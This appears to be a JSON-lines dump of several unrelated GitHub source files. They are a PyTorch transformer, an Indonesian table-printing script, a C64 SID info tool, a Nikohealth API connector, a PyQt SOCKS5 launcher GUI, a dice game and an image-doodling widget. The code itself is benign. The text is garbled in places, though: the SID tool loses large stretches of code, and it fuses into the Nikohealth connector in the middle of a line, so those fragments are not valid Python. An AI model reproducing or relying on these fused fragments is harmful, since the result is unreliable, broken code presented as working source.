(-math.log(10000.0) / d_model))\n pe = torch.zeros(max_len, 1, d_model)\n pe[:, 0, 0::2] = torch.sin(position * div_term)\n pe[:, 0, 1::2] = torch.cos(position * div_term)\n self.register_buffer(\"pe\", pe)\n\n def forward(self, x):\n x = x + self.pe[: x.size(0)]\n return self.dropout(x)\n\n\nclass Transformer(nn.Module):\n def __init__(self, vocab_len: int, d_model: int, nhead: int, dim_feedforward: int, nlayers: int, dropout: float = 0.1):\n super().__init__()\n self.max_len = 400\n\n self.model_type = \"Transformer\"\n self.pos_encoder = PositionalEncoding(d_model, dropout)\n encoder_layers = nn.TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout)\n self.transformer_encoder = nn.TransformerEncoder(encoder_layers, nlayers)\n self.embedding = nn.Embedding(vocab_len, d_model)\n self.d_model = d_model\n self.linear = nn.Linear(d_model, vocab_len)\n\n self._init_weights()\n\n def _init_weights(self) -> None:\n initrange = 0.1\n self.embedding.weight.data.uniform_(-initrange, initrange)\n self.linear.bias.data.zero_()\n self.linear.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, src, src_mask=None):\n \"\"\"\n Arguments:\n src: Tensor, shape ``[batch_size, seq_len, batch_size]``\n src_mask: Tensor, shape ``[seq_len, seq_len]``\n\n Returns:\n output Tensor of shape ``[batch_size, seq_len, ntoken]``\n \"\"\"\n src = src.transpose(0, 1)\n src = self.embedding(src) * math.sqrt(self.d_model)\n src = self.pos_encoder(src)\n if src_mask is None:\n src_mask = nn.Transformer.generate_square_subsequent_mask(len(src)).to(src.device)\n output = self.transformer_encoder(src, src_mask)\n output = self.linear(output)\n output = output.transpose(0, 1)\n return {\"logits\": output}\n\n @torch.inference_mode()\n def inference(self, prefix: str = \"\", temp: float = 1.0) -> str:\n self.eval()\n device = next(self.parameters()).device\n\n tokens = [BOS_ID] + text2ids(prefix)\n tokens = torch.tensor(tokens).to(device)\n\n logits = self.forward(tokens.unsqueeze(0))[\"logits\"]\n logits = logits.transpose(1, 2)\n logits /= temp\n\n new_tokens = torch.distributions.Categorical(logits=logits[:, :, -1]).sample()\n tokens = torch.cat([tokens, new_tokens], dim=0)\n\n while tokens.shape[0] < self.max_len:\n if new_tokens.item() == EOS_ID:\n break\n\n logits = self.forward(tokens.unsqueeze(0))[\"logits\"]\n logits = logits.transpose(1, 2)\n logits /= temp\n\n new_tokens = torch.distributions.Categorical(logits=logits[:, :, -1]).sample()\n tokens = torch.cat([tokens, new_tokens], dim=0)\n\n return ids2text(tokens.squeeze())\n","repo_name":"tgritsaev/tinystories","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9188395661","text":"\"\"\"\ndibawah ini terdapat proses inisialisasi pembacaan file kedalam variabel lain\nsebagai contoh fnama berisi data-data dari file nama.txt yang telah dibaca\ndengan fungsi \"r\"\n\"\"\"\nfnama = open(\"nama.txt\", \"r\")\nfnpm = open(\"npm.txt\", \"r\")\nfkelas = open(\"kelas.txt\", \"r\")\nfjurusan = open(\"jurusan.txt\", \"r\")\n\nreadnama = fnama.readlines()\nreadnpm = fnpm.readlines()\nreadkelas = fkelas.readlines()\nreadjurusan = fjurusan.readlines()\n#Line 11-14 ini fungsinya sebagai membaca file txt nya berupa string\nprint(\"\"\"\n+--------------------+-----------------+-----------+---------------+\n| NAMA | NPM |KELAS |JURUSAN |\n+--------------------+-----------------+-----------+---------------+\"\"\")\n# Kemudian Membuat tabel dengan Print di design seperti code diatas.\nfor i in range (len(readnama)):\n nama = str(readnama[i].strip())\n print('| '+nama,end='')\n #perulangan for dengan variabel i in range atau dalam jarak seberapa panjang, variabel nama tersebut\n #dan variabel nama = string readnama yang dimasukkan variabel i perulangannya dan strip sebagai menghasilkan karakternya besar atau kecil\n #kemudian cetak +nama,end='' artinya mencetak dengan membuat baris baru ketika mencetak lagi.\n for j in range(20-1-len(nama)):\n print(' ',end ='')\n npm = str(readnpm[i].strip())\n print('| '+npm,end='')\n for k in range(17-1-len(npm)):\n print(' ',end ='')\n kelas = str(readkelas[i].strip())\n print('| '+kelas,end='')\n for p in range(11-1-len(kelas)):\n print(' ',end ='')\n jurusan = str(readjurusan[i].strip())\n print('| '+jurusan,end='')\n for v in range(15-1-len(jurusan)):\n print(' ',end ='')\n #selanjutnya masih sama seperti tadi perulangan for dengan variabel j, k, p, v dalam jarak 20-1-len dan 19-1-len dimasukkan variabel nya masing masing disesuaikan\n #mencetak dengan print untuk baris barunya dan npm = string readnpm yang dimasukkan variabel i perulangannya dan strip sebagai menghasilkan karakternya besar atau kecil\n #lalu cetak lagi dengan akhiran end=\n \n print('|')\n #sebagai penutup dari tabel outputan\n\nprint(\"+--------------------+-----------------+-----------+---------------+\")\n#sebagai bagian bawah dari tabel\n","repo_name":"Fadilano/Tugas-Strukdat","sub_path":"readfile.py","file_name":"readfile.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5911467284","text":"#!/usr/bin/python\n# ----------------------------------------------------------------------------\n# Shows SID info - riq\n# ----------------------------------------------------------------------------\n'''\nLittle tool to display SID info\n'''\nfrom __future__ import division, unicode_literals, print_function\nimport sys\nimport os\nimport struct\n\n#reload(sys)\n#sys.setdefaultencoding('utf8')\n\n\n__docformat__ = 'restructuredtext'\n\n\ndef analyze_sidtracker64(v1, buf):\n # Sidtracker64 v2 first 8 bytes\n # jmp 0x1826 ; 3 bytes\n # ldx #0x00 ; 2 bytes\n # jsr 0x17f8 ; 3 bytes...\n # ignore the first 6 bytes then until we get to the '0x17f8'\n address = struct.unpack_from(\"> 1:\n str_flags += ', PlaySID specific'\n else:\n str_flags += ', C64 compatible'\n\n f = (flags & 0b00001100) >> 2\n if f == 0:\n str_flags += ', Unknown'\n elif f == 1:\n str_flags += ', PAL'\n elif f == 2:\n str_flags += ', NTSC'\n elif f == 3:\n str_flags += ', PAL & NTSC'\n\n f = (flags & 0b00110000) >> 4\n if f == 0:\n str_flags += ', Unknown'\n elif f == 1:\n str_flags += ', 6581'\n elif f == 2:\n str_flags += ', 8580'\n elif f == 3:\n str_flags += ', 6581 & 8580'\n\n print(\"Flags: %s\" % str_flags)\n\ndef print_freq_tables(v1, load_addr, buf):\n offset = v1[1]\n\n array = buf[offset+2:-1]\n\n lo_freqs = [\n b'\\x16\\x27\\x38\\x4b\\x5f', # PAL\n b'\\x16\\x27\\x38\\x4b\\x5e', # PAL\n b'\\x16\\x27\\x39\\x4b\\x5f', # PAL\n b'\\x17\\x27\\x39\\x4b\\x5f', # PAL\n\n b'\\x0c\\x1c\\x2d\\x3e\\x51', # NTSC\n b'\\x0c\\x1c\\x2d\\x3f\\x52', # NTSC\n b'\\x0c\\x1c\\x2d\\x3e\\x47', # NTSC\n ]\n\n hi_freqs = [\n # with 12 '01's\n b'\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x02\\x02', # PAL\n # with 11 '01's\n b'\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x02\\x02\\x02',\n ]\n\n\n f_lo = None\n f_hi = None\n f_type = 'PAL'\n\n # try to find lo freq table\n for i,lo in enumerate(lo_freqs):\n found = array.find(lo)\n if found != -1:\n f_lo = found\n if i >= 4:\n f_type = 'NTSC'\n break\n\n for hi in hi_freqs:\n found = array.find(hi)\n if found != -1:\n f_hi = found\n break\n\n if f_lo and f_hi:\n print(\"Freq table addr (lo/hi): $%04x / $%04x (%s)\" % (load_addr + f_lo, load_addr + f_hi, f_type))\n else:\n print(\"Freq table addr: not found\")\n\n\ndef run(sid_file):\n f = open(sid_file)\n buf = f.read()\n\n header = buf[0:4]\n if header == 'PSID' or header == 'RSID':\n print(\"File: %s\" % sid_file)\n v1 = struct.unpack_from(\">HHHHHHHI32s32s32s\", buf, 4)\n flags = None\n addr = struct.unpack_from(\"H\", buf, 118)[0]\n addr = struct.unpack_from(\" [str, str, int]:\n res = requests.post(\n f\"{self._url}\",\n headers={'Content-Type': 'application/x-www-form-urlencoded'},\n auth=(self._client_id, self._client_secret),\n data=\"scope=external&grant_type=client_credentials\"\n )\n json = res.json()\n return [json['token_type'], json['access_token'], json['expires_in']]\n\n def get_access_token(self) -> [str, str]:\n if self._token_has_expired():\n t0 = pendulum.now()\n token_type, token, expires_in = self._refresh_token()\n self._token_type = token_type\n self._access_token = token\n self._token_expiry_date = t0.add(seconds=expires_in)\n\n return [self._token_type, self._access_token]\n\n def _token_has_expired(self) -> bool:\n return pendulum.now() > self._token_expiry_date\n\n def __call__(self, r: requests.Request) -> requests.Request:\n token_type, access_token = self.get_access_token()\n r.headers[\"Authorization\"] = f\"{token_type} {access_token}\"\n return r\n\n\nclass NikohealthStream(HttpStream, ABC):\n url_base = \"https://better.nikohealth.com/api/external/\"\n page_size = 100\n include_sensitive_data = False\n\n def __init__(self, domain: str, client_id: str, client_secret: str, **kwargs):\n super().__init__(**kwargs)\n self.domain = domain\n self.client_id = client_id\n self.client_secret = client_secret\n self.url = f\"https://{domain}.nikohealth.com/api/external/\"\n\n def get_json_schema(self) -> Mapping[str, Any]:\n schema = super().get_json_schema()\n if self.include_sensitive_data:\n return schema\n\n schema[\"properties\"] = {\n key: key_schema\n for key, key_schema in schema[\"properties\"].items()\n if \"sensitive\" not in key_schema or key_schema[\"sensitive\"] is False\n }\n\n return schema\n\n def request_headers(\n self,\n stream_state: Mapping[str, Any],\n stream_slice: Mapping[str, Any] = None,\n next_page_token: Mapping[str, Any] = None\n ):\n return {\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"}\n\n def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n decoded_response = response.json()\n previous_query: dict = urllib.parse.parse_qs(\n urllib.parse.urlparse(response.request.url).query\n )\n previous_page = int(previous_query.get(\"pageIndex\", [\"0\"])[0])\n previous_count = decoded_response.get(\"Count\", 0)\n\n if previous_count > 0 and (previous_page * self.page_size) < previous_count:\n return {\"pageIndex\": previous_page + 1}\n\n return None\n\n def request_params(\n self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None,\n next_page_token: Mapping[str, Any] = None\n ) -> MutableMapping[str, Any]:\n params = {\"pageSize\": self.page_size}\n\n if next_page_token:\n params.update(next_page_token)\n\n return params\n\n def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:\n data = response.json()['Items']\n if isinstance(data, list):\n return data\n return [data]\n\n\nclass Patients(NikohealthStream):\n primary_key = \"Id\"\n\n @property\n def use_cache(self) -> bool:\n return True\n\n def path(\n self, stream_state: Mapping[str, Any] = None, stream_slice: Mapping[str, Any] = None,\n next_page_token: Mapping[str, Any] = None\n ) -> str:\n return \"v1/patients\"\n\n\nclass PatientInsurances(NikohealthStream, HttpSubStream):\n primary_key = 'Id'\n data_field = \"call_metrics\"\n\n def path(\n self,\n *,\n stream_state: Mapping[str, Any] = None,\n stream_slice: Mapping[str, Any] = None,\n next_page_token: Mapping[str, Any] = None\n ) -> str:\n return f\"v1/patients/{stream_slice['parent']['Id']}/insurances\"\n\n\n# Source\nclass SourceNikohealth(AbstractSource):\n _auth: Optional[AuthBase] = None\n\n def auth(self, domain: str, client_id: str, client_secret: str) -> AuthBase:\n if self._auth is None:\n self._auth = NikoAuthenticator(\n client_id=client_id,\n client_secret=client_secret,\n url=f\"https://{domain}.nikohealth.com/api/identity/connect/token\",\n )\n\n return self._auth\n\n def check_connection(self, logger, config) -> Tuple[bool, any]:\n client_id = config[\"client_id\"]\n client_secret = config[\"client_secret\"]\n domain = config[\"domain\"]\n try:\n auth = self.auth(client_id, client_secret, domain)\n res = requests.get(\n f\"https://{domain}.nikohealth.com/api/external/v1/hcpcs?pageSize=10\",\n auth=auth\n )\n res.raise_for_status()\n return True, None\n except Exception as e:\n return False, e\n\n def streams(self, config: Mapping[str, Any]) -> List[Stream]:\n client_id = config[\"client_id\"]\n client_secret = config[\"client_secret\"]\n domain = config[\"domain\"]\n auth = self.auth(domain, client_id, client_secret)\n base_args = dict(\n authenticator=auth,\n client_id=client_id,\n client_secret=client_secret,\n domain=domain\n )\n\n patients = Patients(**base_args)\n return [patients, PatientInsurances(parent=patients, **base_args)]\n","repo_name":"nickydonna/source-nikohealth","sub_path":"source_nikohealth/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":6490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43105661411","text":"import sys\nimport re\nimport socket\nfrom PyQt5.QtWidgets import (QWidget, QToolTip, \n QPushButton, QApplication)\nfrom PyQt5.QtGui import QFont,QPainter,QIntValidator\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtGui import QIcon\nfrom De_socks5_ui import Ui_Form\nfrom Network import Network\nimport subprocess\nimport ctypes\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(\"myappid\")\n#from utils import Wuint\n\nclass My_socks(QWidget):\n \n def __init__(self):\n super().__init__()\n self.wired_enable = False\n self.wifi_enable = False\n self.wired_info = None\n self.wifi_info = None\n self.IP = None\n self.DNS = None\n self.GW = None\n self.PORT = None\n self.socks5 = None\n self.ui = Ui_Form()\n self.count = 0\n self.ui.setupUi(self)\n #self.utils = Wuint()\n #print(self.ui.IP1.rect())\n #print(self.ui.IP1.geometry().x())\n self.setWindowTitle('MyLogo')\n self.setWindowIcon(QIcon(\"./img/window.jpg\"))\n\n self.ip_list = [self.ui.IP1, self.ui.IP2, self.ui.IP3, self.ui.IP4]\n self.dns_list = [self.ui.DNS1, self.ui.DNS2, self.ui.DNS3, self.ui.DNS4]\n self.gw_list = [self.ui.GW1, self.ui.GW2, self.ui.GW3, self.ui.GW4]\n self.start_stop_bn_enable(False)\n\n self.timer = QTimer()\n self.timer.timeout.connect(self.process_poll_check)\n\n Port_Intvalidator = QIntValidator()\n Port_Intvalidator.setRange(1001,65535)\n self.ui.port.setValidator(Port_Intvalidator)\n Intvalidator = QIntValidator()\n Intvalidator.setRange(0,255)\n for item in self.ip_list:\n item.setValidator(Intvalidator)\n for item in self.dns_list:\n item.setValidator(Intvalidator)\n for item in self.gw_list:\n item.setValidator(Intvalidator)\n\n self.ui.GetInfo.setStyleSheet(\"QPushButton{border-image: url(img/before.png)}\")\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_before.png)}\")\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_before.png)}\")\n self.ui.GetInfo.clicked.connect(self.background_change)\n self.ui.wired.clicked.connect(self.wired_bg_change)\n self.ui.wifi.clicked.connect(self.wifi_bg_change)\n self.ui.start.clicked.connect(self.start_socks5)\n self.ui.stop.clicked.connect(self.stop_socks5)\n self.ui.dect.clicked.connect(self.port_check)\n self.ui.clear.clicked.connect(self.clear_text)\n\n def check_ipv4(self,items):\n m = None\n result = None\n regular = r'^(((25[0-5]|2[0-4]\\d|1\\d{2})|([1-9]?\\d))\\.){3}((25[0-5]|2[0-4]\\d|1\\d{2})|([1-9]?\\d))$'\n pattern = re.compile(regular)\n if isinstance(items,list) or isinstance(items,tuple):\n for item in items:\n m = pattern.match(item)\n if m is not None:\n result = item\n break\n else:\n m = pattern.match(items)\n if m is not None:\n result = items\n \n return result\n\n\n def process_poll_check(self):\n if self.socks5 is not None:\n if self.socks5.poll() is None:\n pass\n else:\n if self.count < 5:\n self.ui.textBrowser.append(\"Socks5 is close!!!\")\n self.count = self.count + 1\n else:\n self.ui.textBrowser.append(\"Max count=5 is reach\")\n self.stopTimer()\n\n\n def port_check(self):\n try:\n self.PORT = int(self.ui.port.text())\n except ValueError:\n self.ui.textBrowser.append(\"port is not base 10\")\n return False\n if self.IP is None:\n self.ui.textBrowser.append(\"IP is None\")\n return False\n Tcp_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n try:\n Tcp_sock.bind((self.IP,self.PORT))\n Tcp_sock.close()\n self.ui.textBrowser.append(\"ip %s port %s is free\"%(self.IP,self.PORT))\n return True\n except OSError:\n self.ui.textBrowser.append(\"ip %s port %s is using!!!\"%(self.IP,self.PORT))\n return False\n\n\n def startTimer(self):\n self.ui.textBrowser.append(\"Start Timer for check\")\n self.timer.start(100)\n\n def stopTimer(self):\n self.ui.textBrowser.append(\"Stop Timer for check\")\n self.timer.stop()\n\n def start_socks5(self):\n self.ui.start.setEnabled(False)\n if self.port_check():\n str_cmd = \"python ./socks5_main.py --dns {0} --ip {1} --port {2}\"\n if self.IP is not None and self.DNS is not None and self.PORT is not None:\n cmd = str_cmd.format(self.DNS,self.IP,self.PORT)\n self.ui.textBrowser.append(cmd)\n #self.socks5 = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n #self.socks5 = subprocess.Popen(cmd)\n self.socks5 = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)\n self.socks5.stdin.close()\n self.socks5.stdout.close()\n #print(1111)\n #self.socks5 = subprocess.Popen(cmd)\n self.startTimer()\n else:\n self.ui.textBrowser.append(\"port is using or valid!!!\")\n\n def stop_socks5(self):\n self.ui.start.setEnabled(True)\n self.stopTimer()\n if self.socks5 is not None:\n pid = self.socks5.pid\n self.socks5.terminate()\n self.socks5 = None\n self.ui.textBrowser.append(\"%s is terminate\"%(pid))\n\n def set_value(self,item_list,value_list):\n if value_list == None:\n for item in item_list:\n item.clear()\n else:\n for i, item in enumerate(item_list):\n item.setText(value_list[i])\n\n\n def show_ip_gw_dns(self, data):\n self.IP = self.check_ipv4(data[\"IP\"])\n self.DNS = self.check_ipv4(data[\"DNS\"])\n self.GW = self.check_ipv4(data[\"Gateway\"])\n if self.IP is not None:\n ip_list = self.IP.split(\".\")\n self.set_value(self.ip_list,ip_list)\n if self.DNS is not None:\n dns_list = self.DNS.split(\".\")\n self.set_value(self.dns_list,dns_list)\n if self.GW is not None:\n gw_list = self.GW.split(\".\")\n self.set_value(self.gw_list,gw_list)\n\n def clear_text(self):\n self.ui.textBrowser.clear()\n\n\n def start_stop_bn_enable(self, Flag):\n self.ui.start.setEnabled(Flag)\n self.ui.stop.setEnabled(Flag)\n\n def clear_ip_dns_gw(self):\n self.set_value(self.ip_list,None)\n self.set_value(self.dns_list,None)\n self.set_value(self.gw_list,None)\n self.wired_enable = False\n self.wifi_enable = False\n self.wired_info = None\n self.wifi_info = None\n self.IP = None\n self.DNS = None\n self.GW = None\n self.PORT = None\n self.socks5 = None \n\n def all_stop(self):\n self.stop_socks5()\n self.start_stop_bn_enable(False)\n self.clear_ip_dns_gw()\n\n def wired_bg_change(self):\n if self.wired_enable:\n self.start_stop_bn_enable(True)\n if self.ui.wired.isChecked():\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_press.png)}\")\n self.show_ip_gw_dns(self.wired_info)\n else:\n #self.clear_ip_dns_gw()\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_after.png)}\")\n\n def wifi_bg_change(self):\n if self.wifi_enable:\n self.start_stop_bn_enable(True)\n if self.ui.wifi.isChecked():\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_press.png)}\")\n self.show_ip_gw_dns(self.wifi_info)\n else:\n #self.clear_ip_dns_gw()\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_after.png)}\")\n\n\n #@pyqtSlot()\n def background_change(self):\n if self.ui.GetInfo.isChecked():\n self.ui.GetInfo.setStyleSheet(\"QPushButton{border-image: url(img/press.png)}\")\n network = Network()\n result = network.get_info()\n self.network_show_control(result)\n if self.wired_enable:\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_after.png)}\")\n else:\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_before.png)}\")\n if self.wifi_enable:\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_after.png)}\")\n else:\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_before.png)}\")\n #info = {\"a\":\"b\",\"c\":\"d\"}\n #self.ui.textBrowser.append(str(result))\n else:\n self.all_stop()\n self.ui.GetInfo.setStyleSheet(\"QPushButton{border-image: url(img/before.png)}\")\n self.ui.wired.setStyleSheet(\"QPushButton{border-image: url(img/wired_before.png)}\")\n self.ui.wifi.setStyleSheet(\"QPushButton{border-image: url(img/wifi_before.png)}\")\n self.clean_network_info()\n \n def clean_network_info(self):\n self.wired_info = None\n self.wifi_info = None\n self.wired_enable = False\n self.wifi_enable = False\n\n def network_show_control(self, network_info):\n self.clean_network_info()\n if len(network_info) > 0:\n for i,item in enumerate(network_info):\n if (\"Ethernet\" in item[\"Device\"] or \"Realtek\" in item[\"Device\"] ) and self.wired_info is None:\n self.wired_info = item\n self.wired_enable = True\n if \"Wireless\" in item[\"Device\"] and self.wifi_info is None:\n self.wifi_info = item\n self.wifi_enable = True\n\n self.ui.textBrowser.append(\"========Device%s=============\"%(str(i))) \n for key,value in item.items():\n #print(key,value)\n self.ui.textBrowser.append(str(key)+\":\"+str(value)) \n #print(self.wired_info,self.wired_enable) \n else:\n self.ui.textBrowser.append(\"Not Device Found\")\n\n# def paintEvent(self,event):\n# \tqp.begin(self)\n# \tg_x = self.ui.verticalLayout.geometry().x()\n # \tg_y = self.ui.verticalLayout.geometry().y()\n \t#print(1111)\n # \tprint(self.ui.IP1.x(),self.ui.IP1.y())\n # \tprint(self.ui.IP1.x(),self.ui.IP1.y())\n \t#print(222)\n \t#print(g_x,g_y)\n \t#qp.drawRect(self.ui.IP1.geometry().x()+g_x,self.ui.IP1.geometry().y()+g_y,381,30)\n# \tqp.end()\n\nif __name__ == '__main__':\n \n app = QApplication(sys.argv)\n my_socks = My_socks()\n my_socks.show()\n sys.exit(app.exec_())\n","repo_name":"wangjm12138/Qt_double_network_change","sub_path":"main_orgin.py","file_name":"main_orgin.py","file_ext":"py","file_size_in_byte":11001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73947752804","text":"# Игра \"21\"\n\n# ********************************************************\n# РАЗДЕЛ ИМПОРТА МОДУЛЕЙ\n# ********************************************************\nimport random\n# ********************************************************\n# РАЗДЕЛ СОЗДАННЫХ ФУНКЦИЙ\n# ********************************************************\n\ndef kubiki():\n kubiki = ['''\n ---\n| |\n| |\n| |\n ---\n''','''\n ---\n| |\n| * |\n| |\n ---\n''','''\n ---\n|* |\n| |\n| *|\n ---\n''','''\n ---\n|* |\n| * |\n| *|\n ---\n''','''\n ---\n|* *|\n| |\n|* *|\n ---\n''','''\n ---\n|* *|\n| * |\n|* *|\n ---\n''','''\n ---\n|* *|\n|* *|\n|* *|\n ---\n''']\n return kubiki\n\ndef vopros(textVoprosa):\n # Эта функция возвращает True, если игрок хочет сыграть заново, в противном False\n while True:\n print(textVoprosa)\n otvet = input()\n otvet = otvet.lower()\n if (otvet == 'да') or (otvet == 'д') or (otvet == 'yes') or (otvet == 'y'):\n # ответ да, запускаем игру по новой\n return True\n elif (otvet == 'нет') or (otvet == 'н') or (otvet == 'no') or (otvet == 'n'):\n # игрок отказался от игры, завершаем\n return False\n else:\n print('Я вас не понял! Введите ответ еще раз.')\n\ndef help():\n print(''' Человек кидает по два кубика некоторое количество раз,\n пытаясь набрать 21 очко в сумме. Он может остановиться \n на любом ходе и передать ход компьютеру.\n Если он набирает больше 21 очка в сумме, то признается\n проигравшим.\n Когда ход переходит к компьютеру он также начинает\n бросать по два кубика, пыткаясь набрать количество\n очков больше, чем у человека. Как только он перебил \n количество очков человека, игра заканчивается и \n выигравшим признается компьютер.\n Если в попытке перебить компьютер наберет больше \n 21 очка - он проиграл.\n Если компьютер набирает количество очков равное\n человеку, то признается ничья.\n ''')\n print()\n p = input('для продолжения нажмите на Enter.')\n\ndef brosok():\n k1 = random.randint(1,6)\n k2 = random.randint(1,6)\n sz = []\n sz.append(k1)\n sz.append(k2)\n return sz\n\ndef display(gamer,image,k1,k2,sG,sK):\n print(gamer)\n print(image[k1])\n print(image[k2])\n print()\n print('У игрока - '+str(sG)+'. У компьютера - '+str(sK)+'.')\n print()\n\n# ********************************************************\n# ОСНОВНОЕ ТЕЛО ПРОГРАММЫ\n# ********************************************************\n\nif vopros('Хотите прочитать правила? (да или нет).'):\n help()\n\nktoBrosaet = 'Человек'\nkub = kubiki()\nsummaK = 0\nsummaG = 0\ngame = True\ngamer = True\nkomputer = True\n\nwhile game:\n while gamer:\n kub1,kub2 = brosok()\n summaG = summaG + kub1 + kub2\n display(ktoBrosaet,kub,kub1,kub2,summaG,summaK)\n if summaG > 21:\n print('Вы проиграли!')\n game = False\n gamer = False\n if game and not (input('(Б)росаем еще или передаем ход?').upper() == 'Б'):\n gamer = False\n\n \n print('Передаем ход.')","repo_name":"IgorVash/MyPython","sub_path":"Python_2/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11802053490","text":"from PyQt5.QtWidgets import QLabel, QMessageBox\nimport PIL.Image as img\nfrom re import search\nfrom PyQt5.QtCore import Qt\n\n\nclass ImgLabel(QLabel):\n def __init__(self, parent, how):\n super().__init__(parent)\n self.setStyleSheet(\"QLabel{border:1px solid#FFFFFF}\")\n self.setFixedSize(400, 350)\n self.how = how\n self.father = parent\n self.size_change = 1.0\n self.mouse_down = False\n self.x_move = 0\n self.y_move = 0\n self.img_size = [0, 0]\n self.default_size = []\n self.img_position = [0, 0]\n self.file_path = None\n mid_label = QLabel(self)\n mid_label.setFixedSize(398, 348)\n mid_label.move(1, 1)\n self.img_label = QLabel(mid_label)\n self.draw_list = []\n self.all_draw = []\n self.has_draw = False\n\n # 更改背景图片\n def change_img(self, file_path=None, size=None, draw=None):\n if size:\n self.img_size = list(size)\n self.img_label.setFixedSize(*size)\n if file_path:\n self.file_path = file_path\n self.img_label.move(self.img_position[0], self.img_position[1])\n if draw:\n if draw not in self.all_draw:\n self.all_draw.append([draw, self.father.is_draw, self.father.pen_bold])\n if draw not in self.draw_list:\n self.draw_list.append([draw, self.father.is_draw, self.father.pen_bold])\n # 画的超过100个点就显示\n if len(self.draw_list) > 200:\n self.blit()\n self.img_label.setStyleSheet(\"QLabel{background-image:url(%s);background-repeat:no-repeat;\"\n \"background-position:center;border:none;}\" % self.file_path)\n\n # 鼠标滚轮事件\n def wheelEvent(self, e):\n if e.angleDelta().y() < 0 and self.size_change > 1.0:\n self.size_change -= 0.1\n elif e.angleDelta().y() > 0 and self.size_change < 3.0:\n self.size_change += 0.1\n if self.how == 1:\n image = img.open(self.father.file_path)\n image.thumbnail([400*self.size_change, 350*self.size_change])\n save_path = 'images/temporarys/temporary.'+search(\"\\\\.(.*)$\", self.father.file_path).group(1).lower()\n else:\n image = img.open('images/exhibits/exhibit.'+self.father.category)\n image.thumbnail([400 * self.size_change, 350 * self.size_change])\n save_path = 'images/temporarys/temporary_exhibit.' + self.father.category\n size = image.size\n image.save(save_path)\n image.close()\n self.img_position = [(self.img_position[0]-e.x())*size[0]//self.img_size[0]+e.x(),\n (self.img_position[1] - e.y()) * size[1] // self.img_size[1] + e.y()]\n self.change_img(save_path, size)\n\n # 画线\n def blit(self):\n self.has_draw = True\n image = img.open('images/exhibits/exhibit.' + self.father.category)\n for pos in self.draw_list:\n for x in range(-pos[2], pos[2]+1):\n for y in range(-pos[2], pos[2]+1):\n image.putpixel((pos[0][0] + x, pos[0][1] + y), (int(pos[1][1:3], 16), int(pos[1][3:5], 16), int(pos[1][5:], 16)))\n image.save('images/exhibits/exhibit.' + self.father.category)\n image.thumbnail([400 * self.size_change, 350 * self.size_change])\n image.save('images/temporarys/temporary_exhibit.' + self.father.category)\n image.close()\n self.change_img()\n # 重置draw_list\n self.draw_list = []\n\n def re_blit(self):\n image = img.open('images/exhibits/exhibit.' + self.father.category)\n for pos in self.all_draw:\n for x in range(-pos[2], pos[2]+1):\n for y in range(-pos[2], pos[2]+1):\n image.putpixel((pos[0][0] + x, pos[0][1] + y), (int(pos[1][1:3], 16), int(pos[1][3:5], 16), int(pos[1][5:], 16)))\n return image\n\n # 鼠标按住和释放\n def mousePressEvent(self, e):\n if e.button() == Qt.LeftButton:\n # 更新原图大小\n image = img.open('images/exhibits/exhibit.'+self.father.category)\n self.default_size = image.size\n image.close()\n if not self.father.is_draw or self.how == 1:\n self.setCursor(Qt.ClosedHandCursor)\n self.mouse_down = True\n self.x_move = e.x()\n self.y_move = e.y()\n\n def mouseReleaseEvent(self, e):\n if e.button() == Qt.LeftButton:\n if self.how == 2 and self.draw_list:\n self.blit()\n self.setCursor(Qt.ArrowCursor)\n self.mouse_down = False\n\n def mouseMoveEvent(self, e):\n if self.mouse_down:\n # 涂鸦\n if self.father.is_draw and self.how == 2:\n if self.father.category == 'gif':\n QMessageBox.warning(self.father, '警告!', 'GIF格式的图片无法涂鸦!', QMessageBox.Ok, QMessageBox.Ok)\n elif min(400, self.img_position[0]+self.img_size[0]-2) >= e.x() >= max(self.img_position[0]+2, 0) and \\\n min(350, self.img_position[1] + self.img_size[1]-2) >= e.y() >= max(self.img_position[1]+2, 0):\n self.change_img(draw=[(e.x()-self.img_position[0])*self.default_size[0]//self.img_size[0],\n (e.y() - self.img_position[1]) * self.default_size[1] // self.img_size[1]])\n else:\n # 拖动图片\n if 400 >= self.img_position[0] + (e.x()-self.x_move) >= -self.img_size[0]:\n self.img_position[0] += (e.x() - self.x_move)\n if 350 >= self.img_position[1] + (e.y() - self.y_move) >= -self.img_size[1]:\n self.img_position[1] += 